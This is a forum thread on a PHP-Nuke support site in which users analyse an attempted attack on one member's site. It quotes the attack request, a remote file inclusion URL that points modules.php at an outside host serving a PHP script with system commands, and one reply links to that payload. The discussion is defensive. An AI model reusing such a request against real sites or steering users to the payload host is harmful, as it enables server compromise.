You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 365 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Threshold
The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: New hacking attempt on my site!!! (Score: 1)
by kipuka on Monday, January 12 @ 17:13:21 CET
(User Info | Send a Message)
Grrr. I got this to display all nicely in preview but it still got filtered out. Oh well, go to this url you cited: http://republica.bg/.i/2 and look in the file they tried to upload. You will see a php script with system commands in it.


| Parent

Re: New hacking attempt on my site!!! (Score: 1)
by kipuka on Monday, January 12 @ 17:39:28 CET
(User Info | Send a Message)
I tried uploading a file from another domain this way and it doesn't work on my system. Looking at the code in 6.9 for this particular file, I don't see anyone being able to upload anything off-server like this. I don't know if the same applies for all the other versions.




| Parent

Re: New hacking attempt on my site!!! (Score: 1)
by Zhen-Xjell on Monday, January 12 @ 22:21:17 CET
(User Info | Send a Message) http://castlecops.com
Changing user-agents is certainly a trivial task. However, the agent being used is somewhat of an obscure one that not many folks know.

But take a look at the request to the server:

/modules.php?name=http://republica.bg/.i/2

Its trying to call a module that tends to be a URL. There is no provision there to upload a file to the server. This doesn't provide for any cross site scripting.


| Parent
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.093 Seconds - 192 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::